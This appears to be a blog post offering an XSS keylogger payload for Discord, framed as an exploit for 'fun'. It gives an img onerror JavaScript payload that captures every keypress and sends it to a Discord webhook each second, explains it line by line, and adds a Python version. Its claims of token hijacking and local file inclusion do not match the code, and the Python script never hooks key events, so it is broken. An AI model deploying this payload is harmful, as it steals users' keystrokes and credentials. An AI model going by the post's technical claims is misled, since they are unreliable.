Today I am sharing a very nice exploit for the application discord.
What this code does is it token hijacks a user via a webhook using local file inclusion allowing us to keylog the users every keystroke.
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>Above is the payload it’s self but I will show you a more exciting way to explore the endless script kid selfbot hard chatters day by gaining not only access to their discord account but to their every keystroke meaning that we become the gate keeper of their syskey.
This code installs an event listener that captures every key press made by the user on the webpage and sends the pressed keys to a Discord webhook every second.
The onerror attribute is being used to execute JavaScript code when an error occurs while loading the image specified in the src attribute. Since no image is specified, this code will always execute.
The let x=!1 initializes a boolean variable x with a value of false. The l variable is initialized as an empty string. The document.onkeypress event listener captures every key press made by the user on the webpage and appends the pressed key to the l string. The x variable is set to true to indicate that a key has been pressed.
The setInterval function executes the anonymous function inside it every 1000 milliseconds (1 second). The anonymous function checks if x is true. If it is, it sends an HTTP POST request to the specified Discord webhook with the Content-Type header set to application/json and the body set to a JSON string of the l variable. The x variable is then set to false to reset it for the next key press.
Now we can have some fun here is a python script using this payload
import json
import time
import requests
x = False
l = ""
def on_key_press(event):
global x, l
l += event.key
x = True
def send_to_webhook():
global x, l
if x:
requests.post(
"//discord.com/api/webhook/...",
headers={"Content-Type": "application/json"},
data=json.dumps({"content": l}),
)
x = False
while True:
send_to_webhook()
time.sleep(1)Big shoutout to Kyle Barnthouse from Hephaestus Security
for showing me the payload and Jack Rhysider for making me take a second look at what was possible also a big thanks to discord security for denying my writeup and refusing to fix a very critical data privacy issue thanks guys keep on watching cartoons and what not and ignoring the fact that this is a serious issue.
Written with love Taylor Christian Newsome.
